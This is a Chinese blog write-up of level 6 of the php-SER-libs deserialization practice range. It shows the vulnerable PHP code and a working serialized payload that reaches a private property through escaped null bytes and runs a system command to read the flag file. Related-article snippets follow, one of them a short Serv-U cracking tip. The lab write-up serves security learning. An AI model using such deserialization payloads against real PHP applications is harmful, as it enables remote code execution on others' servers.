php-SER-libs(第六关--考察私有属性)

最新推荐文章于 2024-10-05 08:45:32 发布
最新推荐文章于 2024-10-05 08:45:32 发布
阅读量422 收藏 7
点赞数 12
分类专栏: 渗透测试学习 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/WRplayeR/article/details/134607968
版权

这篇记录一下第六关

<?php
highlight_file(__FILE__);
class secret{
    private $comm;
    public function __construct($com){
        $this->comm = $com;
    }
    function __destruct(){
        echo eval($this->comm);
    }
}
$param=$_GET['param'];
$param=str_replace("%","daydream",$param);
unserialize($param);
?>

这里直接给出payload

O:6:"secret":1:{S:12:"\00secret\00comm";s:24:"system('sort flag.php');";}

解释一下,访问私有属性时需要把类用%00包裹起来,但题目过滤了"%"

所以只能使用\00

还需要注意的是,箭头所指的是大写S,大写的S是为了区分大小写,可以理解为让解释器将\00理解为空字符,否则解释器会将\00认为是普通字符串而非空字符

记一个小疑惑:为什么cat和tac没有回显(URL编码后也不行),要用sort才有回显

hhhalloWelt
关注
专栏目录
PHP连接串口程序php_ser
09-23
php实现RS232串口通信 下载php_ser_5.2.0.zip 解冻把php_ser放到ext目录下, php.ini里加上: extension=php_ser.dll PHP code string ser_version( void ) void ser_open( string port, int baudrate, int databits, string parity, float stopbits, string flowcontrol ) string ser_isopen( void ) void ser_write( string data ) string ser_read( int chars_no ) void ser_close( void )
php反序列化靶场,集合了常见的php反序列化漏洞——由这周末在做梦制作.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,靶场为安全从业者提供了一个模拟真实网络环境的平台。通过构建类似实际网络的拓扑结构、部署各种安全设备和应用,靶场可以模拟出多样化的网络攻防场景。这使得安全人员能够在安全的环境中进行实际操作,全面提升其实战能力。 其次,靶场是渗透测试和漏洞攻防演练的理想场所。在靶场中,安全专业人员可以模拟攻击者的行为,发现系统和应用的漏洞,并进行渗透测试,从而及时修复和改进防御机制。同时,这也为防御方提供了锻炼机会,通过对抗攻击提高防御能力。 靶场的搭建还促进了团队协作与沟通。在攻防对抗中,往往需要多人协同作战,团队成员之间需要密切配合,共同制定攻击和防御策略。这有助于培养团队合作意识,提高协同作战的效率。 此外,靶场为学习者提供了一个安全的学习环境。在靶场中,学生可以通过实际操作掌握安全知识,了解攻击技术和防御策略。这样的学习方式比传统的理论课程更加生动直观,有助于深化对安全领域的理解。 最后,靶场也是安全社区交流的平台。在靶场中,安全从业者可以分享攻防经验,交流最新的安全威胁情报,共同探讨解决方案。这有助于建立更广泛的安全社区,推动整个行业的发展。 总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全的学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好地应对不断演变的网络威胁,提高整体的安全水平。
php-SER-libs【made by 这周末在做梦】
这周末在做梦的博客
03-18 5759
本项目是一个php反序列化靶场,题目难度简单,容易上手。
php-SER-libs-main反序列化靶场通详细思路
qq_73767109的博客
05-30 4763
这里先是要把my类实例化到body中,而project要是my中不存在的方法,理应随便赋值但是在触发__call后call需要输入两个参数,name可以自行赋值,但是func就要在触发时就有参数,所以在给project赋值的时候应该赋参数这样在。主要利用的是session.upload_progress.enabled 当该设置为on 的时候,在向服务器上传任意一个文件的时候php会把该上传文件的详细信息(如上传时间,文件名等)储存在session中,而当我们以。新手学习反序列化
php_ser扩展,在php容器中安装php扩展
weixin_33656931的博客
03-10 406
在docker的php容器中,有些扩展是需要自己安装的,安装方式有普通物理主机有所不同,在这里简单记录一下。一、如何在docker容器中安装php自带的扩展模块?1、进入到php容器中:2、查看php当前自带的扩展模块:或进入扩展模块目录下查看:php自带的扩展若没有安装的话,可以使用以下命令进行安装:3、安装gd扩展模块:a、先安装gd相应的依赖包:[root@server ~]$ apt-ge...
PHP-SER-libs靶场通(1-9)
qq_73792226的博客
09-07 935
就会直接终止,所以我们就要绕过这个匹配,在序列化后也就是在0:6中6的前面加上一个符号使其不被匹配上所以就有了payload。先让body成为my类里的,在让body去调用project,因为my类里没有project所以会调用__call方法。在you类中,有一个destruct方法,内将pro赋值给变量project再调用本类中的body中的project。本对输入的param进行了一个%的过滤,而且类中的属性的变量是私有属性。当array内包裹的第一个值是对象,第二个是对象内的方法时。
Ser-U破解
似水流年
09-12 1788
regedit进入注册表,删除HKEY_LOCAL_MACHINE\SOFTWARE\Onihr键,启动serv-u。
Hyper-V安装Server 2019虚拟机
西京刀客
05-31 3019
Hyper-V是微软的虚拟化产品,是采用类似Vmware ESXi的基于hypervisor的技术,能够实现桌面虚拟化。 本文描述了Hyper-V安装Server 2019虚拟机!
usb2.0-ser! CH34x 驱动程序 WIN10亲测.zip
05-08
标题中的“usb2.0-ser! CH34x 驱动程序 WIN10亲测.zip”表明这是一个针对Windows 10操作系统的USB 2.0串行接口(USB2.0-ser!)和CH34x系列芯片的驱动程序。CH34x系列芯片是由韦尔奇拉科技公司(WCH)生产的,常用于...
USB-232(usb2.0-ser!)CH341SER 驱动
10-10
USB-232(usb2.0-ser!)CH341SER 驱动。
USB-SERIAL-CH340驱动,解决USB2.0-Ser!
06-12
USB-SERIAL-CH340驱动是一款专为USB到串口转换器设计的驱动程序,主要用于解决计算机无法识别或无法正常通信的USB2.0-Ser!问题。这款驱动适用于Windows操作系统,特别是win7-x64平台,它能够使系统识别并正确地与CH...
USB2.0-ser!四合一驱动(包括HL-340)
12-31
USB2.0-ser!四合一驱动程序包是一个集合了多种USB到串口转换器驱动的软件包,其中包括HL-340、FT232、HL-2303和HL-0108这四种常见设备的驱动。这个驱动程序集合对于那些需要将计算机的USB接口与使用串行通信的设备...
RCE+[伪协议综合]
2302_81328699的博客
10-03 412
伪协议综合
Thinkphp/Laravel基于vue的少数民族民歌网络图书馆管理系统
abo2022的博客
09-30 1414
ThinkPHP是一个快速、简单的基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,尤其注重开发体验和易用性,并且拥有众多的原创功能和特性,为WEB应用开发提供了强有力的支持Laravel非常的简洁并且是开源的,Laravel 是一个具有表现力、优雅语法的 Web 应用程序框架. Laravel 是构建现代全栈 Web 应用程序的最佳选择.
精品WordPress主题/响应式个人博客主题Kratos
最新发布
2403_86698467的博客
10-05 485
主题设计简约友好,并且支持响应式,自适应访问,简seo单大方的主页构造,使得博客能在臃肿杂乱的环境中脱颖而出,Kratos内置主题设置,可设置seo键字及站点描述页面伪静态,自定义的顶部样式(背景图 ),
CMSIS-RTOS V2封装层专题视频,一期视频将常用配置和用法梳理清楚,适用于RTX5和FreeRTOS(2024-09-28)
Simon223的博客
10-04 945
CMSIS-RTOS V2封装层专题视频,一期视频将常用配置和用法梳理清楚,适用于RTX5和FreeRTOS(2024-09-28)
php socket客户端
qq_30754685的博客
09-30 437
在软件管理里面安装composer,再在网站管理安装扩展socket。使用的工具为phpstudy。
Spring Boot框架下的新闻推荐技术
2401_85342379的博客
10-04 785
同时也大大提高了手的能力,使其难以充分体会探索的乐趣和成功的创作过程,设计过程中汲取的东西,是一笔宝贵的财富。为系统提供强大的数据库备份工具。
第168天:应急响应-ELK 日志分析系统&Yara规则&样本识别&特征提取&规则编写
weixin_71529930的博客
09-30 1162
案例一:ELK 搭建使用-导入文件&监控日志&语法筛选该软件是专业分析日志的工具,但是不支持安全软件的分析这里我是在kali中搭建的搭建参考文章:(第一篇成功,第二篇呢可能是国外的docker闭了未成功)(本地搭建)(docker搭建)安装完成的界面三种模式选择日志上传上传文件导入命名并导入上传完成以后去查看可以根据不同类别去分类查看IP时间戳ua头这里看到呢ua头有个sqlmap直接定位搜索特征字符不是单独出现,需要在前后加上*
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hhhalloWelt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值